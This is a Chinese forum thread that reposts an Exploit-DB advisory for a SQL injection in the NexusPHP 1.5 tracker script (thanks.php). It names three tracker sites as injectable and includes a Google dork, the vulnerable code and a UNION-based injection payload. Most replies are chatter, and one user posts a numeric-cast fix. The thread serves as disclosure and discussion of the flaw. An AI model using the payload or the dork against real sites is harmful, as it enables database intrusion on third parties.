porreal 发表于 2011-11-22 21:22:22

chinahdtv cnscg 3dpt 都可以注入修改数据库的漏洞 !

chinahdtv cnscg 3dpt都可以注入修改数据库的漏洞 !今天发现NexusPHPSQL注入漏洞 !

http://www.exploit-db.com/exploits/17946/

# Exploit Title: Nexusphp.v1.5 SQL injection Vulnerability

# Google Dork: intitle:nexusphp

# Date: 2011-10-08

# Author: flyh4t

# Software Link: http://sourceforge.net/projects/nexusphp/

# Version: nexusphp.v1.5

# Tested on: linux+apache

# CVE : CVE-2011-4026

   

   

Nexusphp is BitTorrent private tracker scripts written in PHP   

The codes is here http://sourceforge.net/projects/nexusphp/

There is a sql injectiong Vulnerability in thanks.php.

   

-----------------------vul code-------------------

//thanks.php

if ($_GET['id'])

stderr("Party is over!", "This trick doesn't work anymore. You need to click the button!");

$userid = $CURUSER["id"];

$torrentid = $_POST["id"];

$tsql = sql_query("SELECT owner FROM torrents where id=$torrentid");

$arr = mysql_fetch_array($tsql);

-----------------------vul code end-------------------

   

$_POST["id"] is not checked, lead a sql injection Vulnerability

   

-----------------------exploit-------------------

   

_POST : -1 union select version()>4/*

   

-----------------------exploit end -------------------



披甲熊 发表于 2011-11-22 21:29:37

哎呦喂 看不懂啊 你自己发现的啊?去联系网站管理啊 说不定给你大红包啊 哈哈!这个沙发是我的!

Neverthele 发表于 2011-11-22 21:35:47

披甲熊 发表于 2011-11-22 21:29 static/image/common/back.gif
哎呦喂 看不懂啊 你自己发现的啊?去联系网站管理啊 说不定给你大红包啊 哈哈!这个沙发是我的!

你真够水的,这三个站,有两个没有,一个用的是傻瓜密码,不怕

披甲熊 发表于 2011-11-22 21:38:51

Neverthele 发表于 2011-11-22 21:35 static/image/common/back.gif
你真够水的,这三个站,有两个没有,一个用的是傻瓜密码,不怕

必须得水 再说咱水也不是几个字的回复 都是高质量高要求的 今天还没拿硬币呢 你那?

Neverthele 发表于 2011-11-22 21:41:05

披甲熊 发表于 2011-11-22 21:38 static/image/common/back.gif
必须得水 再说咱水也不是几个字的回复 都是高质量高要求的 今天还没拿硬币呢 你那?

{:5_397:}我基本上是不会捡的,感觉这东西和每天发帖数有关

雪豹soft 发表于 2011-11-22 21:42:07

真是高手呀{:1_87:}

叶落无声@2 发表于 2011-11-22 21:46:53

完全表示看不懂{:2_141:}

wosiduyua 发表于 2011-11-22 21:56:51

软件检测的结果吧?

残情弑爱 发表于 2011-11-22 21:59:11

好高深的东西,外行只能来看看热闹了

luoxm@2 发表于 2011-11-22 22:24:26

我是外行,只能看热闹了

兆侗 发表于 2011-11-23 00:07:15

都看不懂,可是见到水王都来了{:1_87:}

Pia 发表于 2011-11-23 00:28:57

希望尽快修补吧

Skyrunner 发表于 2011-11-23 01:00:00

PHP還沒學到,現在被C++ data structure 玩弄中

123ABD 发表于 2011-11-23 12:46:31

LZ技术帝,小白只能围观了

power12317@2 发表于 2011-11-23 14:04:05

早就知道了,于是修复了。
修复方法 :

将$torrentid = $_POST["id"];
改为$torrentid =0 + $_POST["id"];

zhouyu7725 发表于 2011-11-23 15:44:39

技术性的

浪滔天 发表于 2011-11-23 22:22:36

太高深 只能膜拜{:3_153:}

albertshi@2 发表于 2011-11-24 10:57:10

看不懂啊看不懂。。。

albertshi@2 发表于 2011-11-24 10:58:14

power12317 发表于 2011-11-23 14:04 static/image/common/back.gif
早就知道了,于是修复了。
修复方法 :



你应该补充在你的建站贴呢,呵呵

power12317@2 发表于 2011-11-24 11:04:29

albertshi 发表于 2011-11-24 10:58 static/image/common/back.gif
你应该补充在你的建站贴呢,呵呵

呵呵 漏洞什么的 当然是有个特定的站 Nexusphp技术维护联盟: http://nexusphp.org
页: [1] 2
查看完整版本: chinahdtv cnscg 3dpt 都可以注入修改数据库的漏洞 !